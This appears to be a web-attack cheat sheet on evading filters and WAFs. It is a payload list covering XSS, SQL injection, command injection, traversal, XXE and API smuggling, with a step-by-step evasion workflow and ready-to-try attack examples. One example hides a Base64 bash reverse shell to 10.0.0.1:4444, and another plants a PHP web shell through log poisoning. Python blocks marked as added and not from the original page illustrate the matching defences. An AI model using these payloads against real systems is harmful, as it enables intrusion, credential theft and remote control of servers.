Bypassing Filters & WAF

Bypassing filters and Web Application Firewalls (WAF) focuses on altering payloads so they evade detection and still execute successfully in the backend. Filters typically block known malicious patterns, keywords, characters, or sequences. A WAF enforces rulesets that match signatures of common attacks such as <script>, ' OR 1=1, ; ls, ../, and others.
Effective bypassing means either crafting payloads that turn back into their malicious form after the backend processes them, or feeding the parser input that the filter interprets differently from the backend.

Understanding How Filters Fail

Filters fail due to:

  • naive blacklist-based rules

  • improper escaping or sanitization

  • normalizing input incorrectly

  • failing to block encoded versions

  • backend and WAF parsing mismatches

  • focusing only on exact strings

  • missing contextual validation

If any component decodes or processes input differently, attackers exploit the discrepancy.

Types of Filtering Mechanisms

1. Blacklist Filters

Block specific keywords:

  • <script>

  • UNION

  • ;

  • ../../

Easy to bypass by encoding or transformation.

2. Whitelist Filters

Allow only specific characters.
More secure, but still break when:

  • parser accepts extra characters

  • encoding expands into unsafe characters

  • backend normalizes input differently

3. WAF Signature Rules

WAFs block:

  • SQL keywords

  • command separators

  • common XSS patterns

  • traversal sequences

  • known exploit payloads

Payload mutation defeats signature matching.

4. Input Normalization Differences

Attackers exploit differences in how input is decoded or trimmed between:

  • browser vs server

  • WAF vs backend

  • frontend parser vs backend parser

Core Bypass Techniques

Below are fully practical, deep, real-world WAF and filter bypass methods.


Encoding Bypasses

Filters often inspect raw input but not encoded versions.

URL Encoding

%3Cscript%3Ealert(1)%3C/script%3E

Double URL Encoding

%253Cscript%253Ealert(1)%253C/script%253E

HTML Encoding

&lt;script&gt;alert(1)&lt;/script&gt;

If backend decodes twice, script executes.

Hex Encoding

SQL payload:

UNION SELECT 0x61646d696e

Base64 Encoding

Command injection:

bash -c "$(echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80NDQ0IDA+JjE= | base64 -d)"

Backend decodes → executes.


Case Manipulation Bypasses

WAF matches uppercase “UNION”.
Payload:

UnIoN SeLeCt

Mixed-case breaks signature matching.
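As an added illustration (not code from the original page), the following Python shows the defender's side of the encoding and casing sections above: a one-pass, case-sensitive check misses every encoded or mixed-case variant, while decoding to a fixed point and matching case-insensitively catches them all. The sample inputs are constructed from the variants listed in the text; `canonicalize`, `naive_match` and `is_suspicious` are names chosen for this example.

```python
import html
import re
from urllib.parse import unquote

# Constructed sample inputs: the encoded and mixed-case variants from the text, plus
# one benign value that legitimately carries a single layer of URL encoding.
SAMPLES = {
    "plain":      "<script>alert(1)</script>",
    "url":        "%3Cscript%3Ealert(1)%3C/script%3E",
    "double_url": "%253Cscript%253Ealert(1)%253C/script%253E",
    "html":       "&lt;script&gt;alert(1)&lt;/script&gt;",
    "mixed_case": "<ScRiPt>alert(1)</sCrIpT>",
    "benign":     "hello%20world",
}

# Signature applied to the canonical form: case-insensitive, and tolerant of "<script/x>".
SIGNATURE = re.compile(r"<\s*script\b", re.IGNORECASE)


def naive_match(value: str) -> bool:
    """The failing approach: exact, case-sensitive substring test on the raw input."""
    return "<script>" in value


def canonicalize(value: str, max_rounds: int = 5) -> tuple[str, int]:
    """Decode URL and HTML-entity encoding repeatedly until the value stops changing.

    Returns the canonical text and how many decoding rounds were needed. Stopping at a
    fixed point means the check sees the same text the backend will see after any
    number of decode passes; max_rounds bounds the work on pathological input.
    """
    current = value
    for rounds in range(max_rounds):
        decoded = html.unescape(unquote(current))
        if decoded == current:
            return current, rounds
        current = decoded
    return current, max_rounds


def is_suspicious(value: str) -> bool:
    """Flag input whose canonical form matches the signature, or that needed two or
    more decoding rounds: multiply-encoded input is itself a strong anomaly signal."""
    canonical, rounds = canonicalize(value)
    return rounds >= 2 or bool(SIGNATURE.search(canonical))


if __name__ == "__main__":
    for name, sample in SAMPLES.items():
        canonical, rounds = canonicalize(sample)
        print(f"{name:11} naive={naive_match(sample)!s:5} rounds={rounds} "
              f"suspicious={is_suspicious(sample)}  canonical={canonical!r}")
```

The decode-depth signal is worth keeping separate from the signature: a request that needed two decoding passes is anomalous on its own, whatever it decodes to, and logging that count gives detection engineers a cheap, signature-free indicator.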


Separator & Operator Bypasses

SQL Injection

Split keywords:

UN/**/ION SEL/**/ECT

Or, against a filter that removes the keyword once and keeps the remainder:

UNIunionON SELECT

Or:

UN%0AION%0ASELECT

Command Injection

Use alternative separators, or replace whitespace with shell variables:

;id
&whoami
${IFS}ls
$IFS$9ls

Or pipe-based:

||id
|id

Parser Confusion

Different systems handle strings differently.

Trailing Characters

<script/x>alert(1)</script>

Browsers ignore invalid tag attributes.

Breakouts

"></script><script>alert(1)</script>

Null Byte Bypass

../../../etc/passwd%00.png

Backend stops at null byte, WAF doesn’t.


Filter Misdirection

Insert fragments of the blocked tag so that, after the filter strips the tag once, the remaining text reassembles into it:

<scri<script>pt>alert(1)</scri</script>pt>

HTML & JS Contextual Bypasses

Different contexts accept different payloads.

Scriptless XSS

<svg onload=alert(1)>
<math href="javascript:alert(1)">

Event Handlers

<iframe onload=alert(1)>

Using backticks in JS

`;alert(1);// 
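The contextual payloads above all work because user data is written into HTML or JavaScript without being encoded for the context it lands in. As an added example (not from the original page), the encoders below, one per output context, neutralize each of the listed payloads; the template in `render_page`, the sample values and the function names are this example's own.

```python
import html
import json
from urllib.parse import urlsplit

# Constructed payloads from the text, each aimed at a different output context.
TEXT_PAYLOAD = "<svg onload=alert(1)>"
ATTR_PAYLOAD = '"><img src=x onerror=alert(1)>'
JS_PAYLOAD = '";alert(1);//'
URL_PAYLOAD = "javascript:alert(1)"


def for_html_text(value: str) -> str:
    """Element content: encoding & < > is enough to stop a new tag from opening."""
    return html.escape(value, quote=False)


def for_html_attr(value: str) -> str:
    """Quoted attribute value: also encode both quote characters so the attribute
    cannot be closed early (the "> breakout in the text)."""
    return html.escape(value, quote=True)


def for_js_string(value: str) -> str:
    """Value for a JavaScript string literal: JSON-encode, then hex-escape the
    characters json.dumps leaves alone that could end a <script> block or break
    a JS context (< > & and the U+2028/U+2029 line terminators)."""
    encoded = json.dumps(value)
    for raw, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026"),
                     ("\u2028", "\\u2028"), ("\u2029", "\\u2029")):
        encoded = encoded.replace(raw, esc)
    return encoded


def for_href(value: str) -> str:
    """URL attribute: allow only absolute http(s) URLs, then attribute-encode.
    Any other scheme (javascript:, data:, vbscript:) becomes an inert fragment link."""
    cleaned = value.strip()
    if urlsplit(cleaned).scheme.lower() not in ("http", "https"):
        return "#"
    return for_html_attr(cleaned)


def render_page(name: str, href: str, note: str) -> str:
    """Constructed template: each interpolation uses the encoder for its own context."""
    return (
        f"<p>Hello, {for_html_text(name)}</p>\n"
        f'<input value="{for_html_attr(name)}">\n'
        f'<a href="{for_href(href)}">profile</a>\n'
        f"<script>var note = {for_js_string(note)};</script>"
    )


if __name__ == "__main__":
    print(render_page(TEXT_PAYLOAD, URL_PAYLOAD, JS_PAYLOAD))
    print(render_page(ATTR_PAYLOAD, "https://example.com/?q=<b>",
                      "</script><script>alert(1)</script>"))
```

The point of having four encoders rather than one "sanitize" function is that the attribute, text, URL and script contexts each have their own set of dangerous characters; a single HTML-escape pass does nothing for `javascript:` in an `href` or for `</script>` inside a script block, which is exactly the gap the event-handler and backtick payloads exploit.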

SQL WAF Bypass Techniques

Inline Comments

SELECT/**/password/**/FROM/**/users

Keyword Splitting

UN||ION
SEL/**/ECT

Parentheses Bypass

' or (1=1) --

Injection with whitespace alternatives

%0A
%0D
%09
%0C
%20

Using Bitwise Operators

' OR 1|1 --

Time-based without SLEEP keyword

' AND IF(1=1, BENCHMARK(50000000,MD5(1)), 0) --
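An added example (not from the original page) of what a defender does with the mutations listed in this section: normalize the input before matching, so inline comments, whitespace alternatives and mixed case all collapse to one canonical form, and back that up with a parameterized query so that anything the signature misses still reaches the database as data. The sample payloads are the page's own mutated forms plus constructed benign values; `normalize_sql`, `looks_like_sqli`, `demo_db` and `find_user` are names chosen for this example, and the in-memory SQLite table is constructed so it runs offline.

```python
import re
import sqlite3
from urllib.parse import unquote

# Mutated payloads from the text (constructed test set for the normalizer).
PAYLOADS = [
    "UNION SELECT 1,2",
    "UnIoN SeLeCt 1,2",
    "UN/**/ION SEL/**/ECT 1,2",
    "UNION%09SELECT/*payload*/1,2",
    "' or (1=1) --",
    "' OR 1|1 --",
    "' AND IF(1=1, BENCHMARK(50000000,MD5(1)), 0) --",
]
# Benign values that a crude keyword blacklist would wrongly reject.
BENIGN = ["alice", "O'Brien", "Union Station"]

INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
ANY_WHITESPACE = re.compile(r"[\s\x00\x0b]+")   # \s already covers \n \r \t \f \v

SIGNATURES = [
    # No trailing \b: "SELECT/**/1" collapses to "select1" after comment removal.
    re.compile(r"\bunion\s+(all\s+)?select"),
    # A quote immediately followed by a boolean operator.
    re.compile(r"'\s*(or|and)\b"),
]


def normalize_sql(value: str) -> str:
    """Canonical form for matching: URL-decode, drop /* */ comments, collapse every
    whitespace variant to a single space, then case-fold."""
    decoded = unquote(value)
    without_comments = INLINE_COMMENT.sub("", decoded)
    return ANY_WHITESPACE.sub(" ", without_comments).strip().lower()


def looks_like_sqli(value: str) -> bool:
    canonical = normalize_sql(value)
    return any(sig.search(canonical) for sig in SIGNATURES)


def demo_db() -> sqlite3.Connection:
    """Constructed in-memory table so the example runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT NOT NULL)")
    conn.executemany("INSERT INTO users (name) VALUES (?)", [("alice",), ("O'Brien",)])
    return conn


def find_user(conn: sqlite3.Connection, username: str):
    """Parameterized lookup: the value travels separately from the SQL text, so a
    payload that slips past looks_like_sqli is still compared as a literal string."""
    row = conn.execute("SELECT id FROM users WHERE name = ?", (username,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    for p in PAYLOADS + BENIGN:
        print(f"{looks_like_sqli(p)!s:5} {normalize_sql(p)!r}")
    conn = demo_db()
    print(find_user(conn, "O'Brien"), find_user(conn, "' or (1=1) --"))
```

One caveat the example makes visible: `UN%0AION%0ASELECT` normalizes to `un ion select`, which the keyword signature does not flag. Whether that input is dangerous depends entirely on whether the backend's SQL parser treats the newline as a token separator, which is the parsing mismatch the page keeps returning to; the normalizer has to mirror the backend's grammar, and the parameterized query is what holds when it does not.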

Command Injection Bypass Techniques

Using subshells

$(id)
`id`

Using pipes

id|cat
id||cat

Using environment variables

${PATH:0:1}bin${PATH:0:1}sh
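As an added example (not code from the page), the defender's answer to the separator, subshell and environment-variable tricks above: never hand user input to a shell. The child process is started from an argument vector, so `;id`, `$(id)`, backticks and `${IFS}` arrive as literal characters, and the value is additionally checked against a strict allowlist of what a hostname may contain. The example launches the Python interpreter as a stand-in for the real tool so it runs anywhere; `ping` as the tool name, the sample values, and the `is_valid_host`, `build_command`, `echo_argument` and `shell_quoted` names are this example's assumptions.

```python
import re
import shlex
import subprocess
import sys

# Constructed samples: separators and expansions listed on the page, plus a benign host.
PAYLOADS = [";id", "&whoami", "${IFS}ls", "$IFS$9ls", "|id", "||id", "$(id)", "`id`",
            "${PATH:0:1}bin${PATH:0:1}sh"]
BENIGN_HOST = "example.com"

# Allowlist: what a hostname may contain. Anything else is rejected before a command exists.
HOSTNAME = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9.-]{0,251}[A-Za-z0-9])?$")


def is_valid_host(value: str) -> bool:
    return HOSTNAME.fullmatch(value) is not None


def build_command(host: str) -> list[str]:
    """Argument vector for a lookup tool. A list, never a string: there is no shell
    to interpret separators, pipes, subshells or variable expansion."""
    if not is_valid_host(host):
        raise ValueError(f"rejected host: {host!r}")
    return ["ping", "-c", "1", host]   # tool name is a constructed example


def echo_argument(value: str) -> str:
    """Show what a child process actually receives when started from an argv list.
    Uses the Python interpreter as a portable stand-in for any external tool."""
    result = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1])", value],
        capture_output=True, text=True, check=True,
    )
    return result.stdout.rstrip("\n")


def shell_quoted(value: str) -> str:
    """If a shell is unavoidable (for example a remote command line), quote each
    argument so it is one word with no special meaning to the shell."""
    return shlex.quote(value)


if __name__ == "__main__":
    print(build_command(BENIGN_HOST))
    for p in PAYLOADS:
        print(f"valid_host={is_valid_host(p)!s:5} child_saw={echo_argument(p)!r} "
              f"quoted={shell_quoted(p)}")
```

Note the order of defences: the allowlist rejects every listed payload before any process is created, and the argv form means that even a value the allowlist would accept cannot become a second command. Blacklisting `;` and `&&`, which Example 3 later shows being bypassed with pipes and subshells, plays no part.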

File Path Bypasses (LFI/RFI)

Directory traversal encoding

..%2f..%2f..%2fetc/passwd

Double encoding:

..%252f..%252f..%252fetc/passwd

Wrappers

php://filter/convert.base64-encode/resource=index.php

Log poisoning bypass:

User-Agent: <?php system($_GET['cmd']); ?>

Load:

/var/log/apache2/access.log
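Added example (not part of the page) of how a backend closes off the traversal, null-byte and wrapper tricks in this section: decode to a fixed point, reject NUL bytes and URL schemes outright, then resolve the candidate path and require it to stay under the served directory. The base directory and inputs are constructed; `decode_fully`, `safe_relative_path` and `check` are this example's own names.

```python
import os
import re
from urllib.parse import unquote

BASE_DIR = "/srv/app/uploads"   # constructed: the only directory the handler may serve
SCHEME = re.compile(r"^[a-zA-Z][a-zA-Z0-9+.-]*:")   # php://, file://, data:, ...


def decode_fully(value: str, max_rounds: int = 5) -> str:
    """URL-decode until stable so %2f and %252f both end up as '/'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def safe_relative_path(base_dir: str, user_path: str) -> str:
    """Return the path relative to base_dir that user_path resolves to, or raise ValueError."""
    decoded = decode_fully(user_path)
    if "\x00" in decoded:
        raise ValueError("NUL byte in path")          # a C-level open() would truncate here
    if SCHEME.match(decoded):
        raise ValueError("URL scheme not allowed")    # blocks php://filter and friends
    decoded = decoded.replace("\\", "/")              # treat backslashes as separators too
    base = os.path.realpath(base_dir)
    # Leading slashes are stripped so an absolute path is re-rooted under base, not honoured.
    candidate = os.path.realpath(os.path.join(base, decoded.lstrip("/")))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("path escapes base directory")
    return os.path.relpath(candidate, base)


def check(user_path: str) -> str:
    """Human-readable verdict used by the demo below and by tests."""
    try:
        return "ok: " + safe_relative_path(BASE_DIR, user_path)
    except ValueError as exc:
        return "rejected: " + str(exc)


if __name__ == "__main__":
    for p in ["reports/2024/q1.pdf",
              "..%2f..%2f..%2fetc/passwd",
              "..%252f..%252f..%252fetc/passwd",
              "../../../etc/passwd%00.png",
              "php://filter/convert.base64-encode/resource=index.php",
              "..\\.\\/",
              "/var/log/apache2/access.log"]:
        print(f"{p!r:60} -> {check(p)}")
```

Resolving the path and checking containment is what makes this robust: nothing here looks for the string `../`, so the `..%2f`, `..%252f` and backslash variants from Example 4 are handled by the same rule as the plain form, and the realpath step also catches a symlink placed inside the directory that points outside it. The log-poisoning vector is closed by the same check, since `/var/log/...` is re-rooted under the served directory rather than opened as given.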

JavaScript Prototype Pollution Bypasses

Some WAF rules block __proto__, so attacker uses:

constructor.prototype

Or encoding:

%5F%5Fproto%5F%5F

XXE Bypass Techniques

External Entities

<!DOCTYPE foo [<!ENTITY x SYSTEM "file:///etc/passwd">]>

Compression-based exfiltration

A WAF that does not decompress request bodies may let an XXE payload through when the request is gzip-encoded.


WebSocket WAF Bypass

Most WAFs do not inspect WebSocket frames.

Send payload directly in WebSocket:

{"action":"execute","cmd":"id"}

WAF never sees it.


API WAF Bypass

JSON Injection Bypass

{"role": "admin"}

If field is not validated, bypass succeeds.

Nested payloads

{"data": {"data":{"role":"admin"}}}

Array smuggling

{"role":["admin"]}

Backend converts array → string.
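As an added example (not from the original page), a schema-driven validator that closes the JSON, nested-object, array-smuggling and prototype-pollution cases from the API and prototype pollution sections above: unknown fields are rejected rather than ignored, each field must have exactly its declared type (so an array where a string is expected fails instead of being stringified), nested objects carry their own allowlists, and keys are compared after URL-decoding so `%5F%5Fproto%5F%5F` is caught along with `__proto__` and `constructor`. The schema, field names and samples are constructed for the example; `naive_contains_admin` reproduces the flattening behaviour the text warns about.

```python
import json
from urllib.parse import unquote

# Constructed schema: the fields a client may set. "role" is deliberately absent,
# because it is assigned server-side and must never be client-controlled.
SCHEMA = {
    "username": str,
    "display_name": str,
    "settings": {"theme": str, "locale": str},   # nested object with its own allowlist
}

# Keys that can reach Object.prototype when a JS backend merges objects recursively.
FORBIDDEN_KEYS = {"__proto__", "constructor", "prototype"}


def naive_contains_admin(data: dict) -> bool:
    """The failure mode from the text: stringifying a value before comparing it
    makes ["admin"] and {"admin": true} look like the string "admin"."""
    return "admin" in str(data.get("role", ""))


def validate(data, schema, path="$"):
    """Allowlist validation. Raises ValueError naming the offending field."""
    if not isinstance(data, dict):
        raise ValueError(f"{path}: object required")
    for key in data:
        if unquote(key) in FORBIDDEN_KEYS:
            raise ValueError(f"{path}.{key}: forbidden key")
        if key not in schema:
            raise ValueError(f"{path}.{key}: unknown field")
    for key, expected in schema.items():
        if key not in data:
            continue   # every field is optional in this example
        value = data[key]
        if isinstance(expected, dict):
            validate(value, expected, f"{path}.{key}")
        elif type(value) is not expected:   # exact type: no coercion, no stringifying
            raise ValueError(
                f"{path}.{key}: expected {expected.__name__}, got {type(value).__name__}")
    return data


def check(raw_json: str) -> str:
    """Verdict string for one request body (json.JSONDecodeError is a ValueError)."""
    try:
        validate(json.loads(raw_json), SCHEMA)
        return "accepted"
    except ValueError as exc:
        return f"rejected ({exc})"


if __name__ == "__main__":
    for body in ['{"username": "alice", "settings": {"theme": "dark"}}',
                 '{"username": "alice", "role": "admin"}',
                 '{"username": ["admin"]}',
                 '{"username": "a", "settings": {"data": {"role": "admin"}}}',
                 '{"__proto__": {"admin": true}, "username": "a"}',
                 '{"username": "a", "settings": {"%5F%5Fproto%5F%5F": {}}}']:
        print(f"{body:62} -> {check(body)}")
    print(naive_contains_admin({"role": ["admin"]}))
```

Rejecting unknown fields is the single most important line: a validator that only checks the fields it knows about silently accepts `role`, `data.role` and every other name an attacker tries, which is precisely the nested and array smuggling the text describes.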


Frontend Validation Bypass

The WAF or application may rely on frontend restrictions that the server never re-checks.

  • disable JavaScript in browser

  • intercept and modify requests in Burp

  • use curl or script-based requests

  • remove client-side headers


Practical Evasion Workflow

Step 1: Identify blocked patterns

Send basic malicious payload and observe:

  • blocked characters

  • error messages

  • server responses

  • transformation behavior

Step 2: Test encodings

Try URL, double-URL, Base64, hex.

Step 3: Try breaking WAF regex

Use:

  • split keywords

  • comments

  • uncommon whitespace

  • newline injection

  • mixed casing

Step 4: Try alternative vectors

Example: SVG instead of <script>.

Step 5: Attempt bypass via alternate methods

Use wrappers, different injection points, or chain multiple encodings.

Step 6: Force normalization

Check if backend decodes twice.


Practical Attack Examples

Example 1: XSS blocked on <script>

Try:

<svg/onload=alert(1)>

Or:

<iframe srcdoc="<script>alert(1)</script>">

Or:

"><img src=x onerror=alert(1)>

Example 2: SQLi WAF blocks “UNION”

Try:

UN%0AION
UN/**/ION
UNION SELECT/*payload*/1,2
UNIunionON SELECT

Example 3: Command injection filter blocks ; and &&

Use:

| id
`id`
$(id)
${IFS}id

Example 4: LFI filter blocks “../”

Use:

..%2f
..%252f
..\.\/

Example 5: API blocks dangerous fields

Use nested object smuggling:

{"role":{"admin":true}}

Backend may flatten → role=admin.


Intel Dump

  • Filters and WAFs block signatures, not logic.

  • Encoding, casing, comment injection, and splitting keywords bypass most signatures.

  • Payloads mutate with hex, URL, Base64, UTF-7, whitespace alternatives, and broken syntax.

  • SQLi bypass uses keyword splitting, inline comments, bitwise operations, and blind techniques.

  • XSS bypass uses SVG, event handlers, HTML smuggling, and JS escape sequences.

  • Command injection bypass uses pipes, subshells, backticks, and environment variables.

  • LFI bypass uses traversal encoding, wrappers, and log poisoning.

  • WebSockets bypass WAF entirely because frames are rarely inspected.

  • Strong bypassing requires matching parser behavior and exploiting normalization differences.
